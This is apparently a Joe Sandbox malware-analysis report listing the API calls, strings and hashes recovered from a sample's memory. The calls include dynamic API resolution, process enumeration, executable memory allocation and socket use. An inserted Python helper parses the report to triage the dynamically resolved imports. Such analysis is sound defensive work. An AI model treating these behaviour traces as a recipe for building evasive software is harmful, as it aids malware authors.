                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: c277bcb1bbdb54650b6136c54a35d6fd1dde034cb80f40bbd962a0f544fbd435
                                                          • Instruction ID: 01f668ce2a9dc8e0a8a01dd3a8cd96805b1802ce99177211013fc765f7623d31
                                                          • Opcode Fuzzy Hash: c277bcb1bbdb54650b6136c54a35d6fd1dde034cb80f40bbd962a0f544fbd435
                                                          • Instruction Fuzzy Hash: 6C11E372264249BEDF249F64CC45FEB3BAEEF89B14F114119FA41A61D0D7719861CB20
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 002D6FC7
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002D6FD6
                                                          Strings
                                                          • rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr, xrefs: 002D6F50
                                                          • edit, xrefs: 002D6FAB
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                                                          • API String ID: 2978978980-1987541987
                                                          • Opcode ID: 6543aa2557cbf79596fd3d21d79c15615983c43e3b45854c1a667aa5e9382255
                                                          • Instruction ID: a529562f2abe995942194c743b53b607889538d97056d2fec47073c3853c4a05
                                                          • Opcode Fuzzy Hash: 6543aa2557cbf79596fd3d21d79c15615983c43e3b45854c1a667aa5e9382255
                                                          • Instruction Fuzzy Hash: 4311BF71120609AFEB104F64EC88EFB3B6AEB05364F104715F966976E0C771DCA19B60
                                                          APIs
                                                            • Part of subcall function 0028B544: _memset.LIBCMT ref: 0028B551
                                                            • Part of subcall function 00270B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0028B520,?,?,?,0025100A), ref: 00270B79
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0025100A), ref: 0028B524
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0025100A), ref: 0028B533
                                                          Strings
                                                          • =/, xrefs: 0028B514
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0028B52E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=/
                                                          • API String ID: 3158253471-1600368204
                                                          • Opcode ID: 3fac297a7d3d50f652416476aa554a2e7ef0938f59287c83e01b93076e574306
                                                          • Instruction ID: 1a17371c6f91021f70ed65af0d0b9a8518c9a68f64417597a54619f98ccf765a
                                                          • Opcode Fuzzy Hash: 3fac297a7d3d50f652416476aa554a2e7ef0938f59287c83e01b93076e574306
                                                          • Instruction Fuzzy Hash: FFE065B41103528BD321AF35E448752BAE4AF04344F44895DE845C6780D7B8D555CB51
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0029027A,?), ref: 002CC6E7
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002CC6F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                          • API String ID: 2574300362-1816364905
                                                          • Opcode ID: f6511850e32b47740143f57dbf0952c3c07641b1298a2c2c59a0180ea7a38ed4
                                                          • Instruction ID: 644b59e37032a3fb796ca5168961d4640fdcef5d9e37ddb9c0a20d142058eb7b
                                                          • Opcode Fuzzy Hash: f6511850e32b47740143f57dbf0952c3c07641b1298a2c2c59a0180ea7a38ed4
                                                          • Instruction Fuzzy Hash: F1E08C385603138FD7205F26D888F42B6E8EB04724BA0842DE889CA250E7B0D8908B50
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00264B44,?,002649D4,?,?,002627AF,?,00000001), ref: 00264B85
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00264B97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: 4d591cb3540c07423a04d4db3e16d2ca58a5783b326ec9dfeb64ef0357953098
                                                          • Instruction ID: f3f080712cb90bb6823d981729b91e99147347f050c13ecadc6695e866e4f52c
                                                          • Opcode Fuzzy Hash: 4d591cb3540c07423a04d4db3e16d2ca58a5783b326ec9dfeb64ef0357953098
                                                          • Instruction Fuzzy Hash: 91D01270D607538FD7205F71EC9874676E4AF05755F51882ED4C5DA550D6B0E8D0C610
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00264AF7,?), ref: 00264BB8
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00264BCA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: 7b54d34a09662a293ea151e0583a9961fffed15e24882d6cee0bee93aa4d6c8b
                                                          • Instruction ID: 3eeababef0e7e1bfb736659622cf0dca14ccc62c05cfcbbffb2db0bcc23748d4
                                                          • Opcode Fuzzy Hash: 7b54d34a09662a293ea151e0583a9961fffed15e24882d6cee0bee93aa4d6c8b
                                                          • Instruction Fuzzy Hash: 18D0C730CA03138FD720AF32EC88B0672E4AF00340B008C2ED4CACA991EAB0D8E0CA10
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,002D1696), ref: 002D1455
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002D1467
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: 051977ef1eb08393a8f39ff18cef453369768126f3f8af380593f7896fa09b3c
                                                          • Instruction ID: e29fda79a6fb9729c140e9fa791247fbe0510d717e66a82ef30ad45bd780cc11
                                                          • Opcode Fuzzy Hash: 051977ef1eb08393a8f39ff18cef453369768126f3f8af380593f7896fa09b3c
                                                          • Instruction Fuzzy Hash: 10D0C2304613139FD7204FB1D88824272E4AF02381B10C82ED4D5DA690D6B0D8D0C650
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00265E3D), ref: 002655FE
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00265610
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: d88eaa677296d5f84b63b952c818a90e4e641c752df2757636f2d9ab738e6147
                                                          • Instruction ID: 1d4a76d41a29cf07701f6f70cbbcb25f3197372efc6a0c9453b4e6130c6389e1
                                                          • Opcode Fuzzy Hash: d88eaa677296d5f84b63b952c818a90e4e641c752df2757636f2d9ab738e6147
                                                          • Instruction Fuzzy Hash: 9FD0C234CB0763CFD7304F36D8C820676E8AF01745F81882DD485CA151D6B0C4D0C650
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,002C93DE,?,002E0980), ref: 002C97D8
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002C97EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: 7c50fc25f6d6774c74b1793cab7c23ad03a6f80a813d0dd4612e490ab96cdb8a
                                                          • Instruction ID: 41031a1123f742974284fbc8f002ff765743c21fefde6e45a7608f39cba931f3
                                                          • Opcode Fuzzy Hash: 7c50fc25f6d6774c74b1793cab7c23ad03a6f80a813d0dd4612e490ab96cdb8a
                                                          • Instruction Fuzzy Hash: 3AD012709617538FD7209F71E8CC746B6E4AF05791B51882DD4C5DA950DBB0C4D0C611
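The six LoadLibraryA/GetProcAddress blocks above are what backs the "dynamically determine API calls" signature: the names resolved at run time (GetSystemWow64DirectoryW, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, RegDeleteKeyExW, GetNativeSystemInfo, GetModuleHandleExW) never appear in the import table, so they are worth pulling out of the report as a unit. The Python below is an added triage helper, not part of Joe Sandbox or of the sample; it assumes only the "• Name.MODULE(args), ref: ADDR" line format shown in this report, and its sample input is a constructed copy of those lines. It pairs each GetProcAddress with the nearest preceding LoadLibrary call, skips ordinals and unrecoverable names, and annotates each symbol with its documented Win32 meaning.

```python
import re
from collections import defaultdict

# Constructed sample input: API lines copied from the function blocks above,
# in the "• Name.MODULE(args), ref: ADDRESS" form the report prints.
SAMPLE_REPORT = """\
• LoadLibraryA.KERNEL32(kernel32.dll,?,0029027A,?), ref: 002CC6E7
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002CC6F9
• LoadLibraryA.KERNEL32(kernel32.dll,?,00264B44,?,002649D4,?,?,002627AF,?,00000001), ref: 00264B85
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00264B97
• LoadLibraryA.KERNEL32(kernel32.dll,?,00264AF7,?), ref: 00264BB8
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00264BCA
• LoadLibraryA.KERNEL32(advapi32.dll,?,002D1696), ref: 002D1455
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002D1467
• LoadLibraryA.KERNEL32(kernel32.dll,?,00265E3D), ref: 002655FE
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00265610
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,002C93DE,?,002E0980), ref: 002C97D8
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002C97EA
• IsDebuggerPresent.KERNEL32(?,?,?,0025100A), ref: 0028B524
"""

API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_lines(text):
    """Return a list of (api, module, args, ref) tuples, one per API line.

    Lines without a parenthesised argument list (e.g. "_memset.LIBCMT ref: ...")
    are skipped; they carry no operands worth pairing."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append((m.group("api"), m.group("module"),
                          m.group("args").split(","), m.group("ref")))
    return calls


def dynamic_imports(calls):
    """Pair each GetProcAddress with the closest preceding LoadLibrary*/GetModuleHandle* call.

    The report lists a function's calls in address order, so the call that produced
    the module handle normally sits right before the GetProcAddress that consumes it.
    Returns {dll name: [symbol, ...]} in report order."""
    resolved = defaultdict(list)
    current_dll = None
    for api, _module, args, _ref in calls:
        if api.startswith(("LoadLibrary", "GetModuleHandle")):
            current_dll = args[0].lower() if args and args[0] != "?" else None
        elif api == "GetProcAddress" and len(args) >= 2:
            symbol = args[1].strip()
            # An 8-digit hex value or "?" means the name was an ordinal or was not
            # statically recoverable; skip it rather than guess.
            if re.fullmatch(r"[0-9A-Fa-f]{8}|\?", symbol):
                continue
            resolved[current_dll or "<unknown>"].append(symbol)
    return dict(resolved)


# Documented Win32 semantics of the late-bound names seen in this report. Late
# binding of exactly these APIs is also common in legitimate installers built to
# run on old Windows versions that lack them, so none of this is malicious on its own.
SYMBOL_NOTES = {
    "GetSystemWow64DirectoryW": "locates SysWOW64; WOW64-aware code",
    "Wow64DisableWow64FsRedirection": "32-bit process reaching the real System32 on 64-bit Windows",
    "Wow64RevertWow64FsRedirection": "restores file-system redirection afterwards",
    "GetNativeSystemInfo": "reports the host CPU architecture even under WOW64",
    "RegDeleteKeyExW": "deletes a registry key from a chosen 32/64-bit registry view",
    "GetModuleHandleExW": "module lookup by address or name with pin/ref-count flags",
}


def triage(text):
    """Flatten the dynamic imports into (dll, symbol, note) rows for a triage table."""
    rows = []
    for dll, symbols in dynamic_imports(parse_api_lines(text)).items():
        for s in symbols:
            rows.append((dll, s, SYMBOL_NOTES.get(s, "no note")))
    return rows


if __name__ == "__main__":
    for dll, symbol, note in triage(SAMPLE_REPORT):
        print(f"{dll:14} {symbol:34} {note}")
```

Run it as-is to get the six-row table for this report, or feed it the full API list of another Joe Sandbox report. Two reading caveats for this particular section: the WOW64 redirection pair is the standard way a 32-bit binary reaches the real System32 on 64-bit Windows, which installers and droppers alike need; and the IsDebuggerPresent call at 0028B524 sits beside the "ERROR : Unable to initialize critical section in CAtlBaseModule" string, which matches ATL's own CAtlBaseModule constructor (it guards its OutputDebugString with IsDebuggerPresent), so that call by itself is runtime boilerplate rather than evidence of anti-debugging in the sample's own code.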
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?), ref: 002CE7A7
                                                          • CharLowerBuffW.USER32(?,?), ref: 002CE7EA
                                                            • Part of subcall function 002CDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002CDEAE
                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 002CE9EA
                                                          • _memmove.LIBCMT ref: 002CE9FD
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                          • String ID:
                                                          • API String ID: 3659485706-0
                                                          • Opcode ID: d13b78794343da212061d895c9bc5aba135cb086eefb906118c120c015abd954
                                                          • Instruction ID: e097addfa924faac5bbcfb22bd28242b497ec1a297ca89cf25d9a91e76358c1a
                                                          • Opcode Fuzzy Hash: d13b78794343da212061d895c9bc5aba135cb086eefb906118c120c015abd954
                                                          • Instruction Fuzzy Hash: 73C17B716243418FCB14DF28C480A6ABBE4FF89718F058A6EF8999B351D731E955CF82
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 002C87AD
                                                          • CoUninitialize.OLE32 ref: 002C87B8
                                                            • Part of subcall function 002DDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,002C8A0E,?,00000000), ref: 002DDF71
                                                          • VariantInit.OLEAUT32(?), ref: 002C87C3
                                                          • VariantClear.OLEAUT32(?), ref: 002C8A94
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 780911581-0
                                                          • Opcode ID: d5189f486b87cc78d86056cb55942dfd7f1433b35f8f5beedf99606f0e2d6c08
                                                          • Instruction ID: b156c148cd0b1880667b0875d4072756860d876837fe4f82e79ce1111df932a5
                                                          • Opcode Fuzzy Hash: d5189f486b87cc78d86056cb55942dfd7f1433b35f8f5beedf99606f0e2d6c08
                                                          • Instruction Fuzzy Hash: 09A12435224A019FD710EF54C481F2AB7E4BF88314F148A4DF9999B3A1CB70ED64CB96
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,002E3C4C,?), ref: 002A8308
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,002E3C4C,?), ref: 002A8320
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,002E0988,000000FF,?,00000000,00000800,00000000,?,002E3C4C,?), ref: 002A8345
                                                          • _memcmp.LIBCMT ref: 002A8366
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID:
                                                          • API String ID: 314563124-0
                                                          • Opcode ID: 62a9ad35d33e7b74cf75c803c66370f10d50f23f2e21870578a1047dc49540ed
                                                          • Instruction ID: 6b94fe26102d9a890fb227ea4d06f3a817a3fdacd14a44e21925d669df84791f
                                                          • Opcode Fuzzy Hash: 62a9ad35d33e7b74cf75c803c66370f10d50f23f2e21870578a1047dc49540ed
                                                          • Instruction Fuzzy Hash: 12812C71A10109EFCB04DFD4C888EEEB7B9FF89315F244598E505AB250DB71AE56CB60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: e876d1e5ed574567aeec6cfab7add39eab4cc3bc32f923d4113c99e32a1bd50c
                                                          • Instruction ID: f6163f8dcfaf698daa25a415e47ca0b639ab361579fb8d327bdf07a440d9d248
                                                          • Opcode Fuzzy Hash: e876d1e5ed574567aeec6cfab7add39eab4cc3bc32f923d4113c99e32a1bd50c
                                                          • Instruction Fuzzy Hash: 4351A830638B029BD7209F79DC95B2DF3E9AF46711B20882FE546C76D1DF7098608B19
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 002CF526
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 002CF534
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 002CF5F4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 002CF603
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                          • String ID:
                                                          • API String ID: 2576544623-0
                                                          • Opcode ID: f97c34994a9513de3feb4d386b92c62d08734d9b2cd6bc2241f8310401357001
                                                          • Instruction ID: 5e77715231ea4d19b8aaca6ce7140ed6e0e2bafc303659653fe1a1c4ea9062fd
                                                          • Opcode Fuzzy Hash: f97c34994a9513de3feb4d386b92c62d08734d9b2cd6bc2241f8310401357001
                                                          • Instruction Fuzzy Hash: D5518C711243119FD310EF20D886E6BB7E8EF94704F44492DF995D72A1EB70A968CF92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                          • String ID:
                                                          • API String ID: 2782032738-0
                                                          • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                          • Instruction ID: 020fe9e5777dd0947a33bbee81c9b8fa85a8417a1306b0b90a87b32f845baa78
                                                          • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                          • Instruction Fuzzy Hash: 0A41E531620707DBDF28AE69C8A096F77A5AF85360B24C13DE95D87680D770DD608B44
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002AA68A
                                                          • __itow.LIBCMT ref: 002AA6BB
                                                            • Part of subcall function 002AA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002AA976
                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 002AA724
                                                          • __itow.LIBCMT ref: 002AA77B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: 9866ef34da5431de55dac7014af9a0355b748e8dbf98a1e2356e807ec814edd2
                                                          • Instruction ID: 346cd8c195ff1dcfb1c74d6b50722fdd6c82894f9b385a9fe964111a9cfa8584
                                                          • Opcode Fuzzy Hash: 9866ef34da5431de55dac7014af9a0355b748e8dbf98a1e2356e807ec814edd2
                                                          • Instruction Fuzzy Hash: 82419074A10249ABDF11EF54CC46BEEBBB9EF45750F040059F905A3281DB70A9A4CFA2
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 002C70BC
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C70CC
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002C7130
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C713C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                          • String ID:
                                                          • API String ID: 2214342067-0
                                                          • Opcode ID: 0439192cdf1fa753ca6072222351a7fecd0d2c305aaed1c08b9461dead126912
                                                          • Instruction ID: 0422f01d0fc97beb30e14d8ff1a1452356238b3d4ea307bcbc3bd67a5b532e64
                                                          • Opcode Fuzzy Hash: 0439192cdf1fa753ca6072222351a7fecd0d2c305aaed1c08b9461dead126912
                                                          • Instruction Fuzzy Hash: E8419F716602106FEB20BF24DC86F2AB7E4DB04B18F048558FE199B3C2DAB09D558F95
                                                          APIs
                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,002E0980), ref: 002C6B92
                                                          • _strlen.LIBCMT ref: 002C6BC4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: 7564dc4df6fb6703d4689528b175aa6378512cbe7d170a87287fb1cf11f1a2a0
                                                          • Instruction ID: 4f8aaa74c9619bfa32be5a3e0cd0e2cf9a08d09d696d8b4ad8116caec7accba8
                                                          • Opcode Fuzzy Hash: 7564dc4df6fb6703d4689528b175aa6378512cbe7d170a87287fb1cf11f1a2a0
                                                          • Instruction Fuzzy Hash: 5D41C331620105ABCB04FB64DCD9FBEB3A9EF54314F148259F81A9B292DB30AE65CF54
                                                          APIs
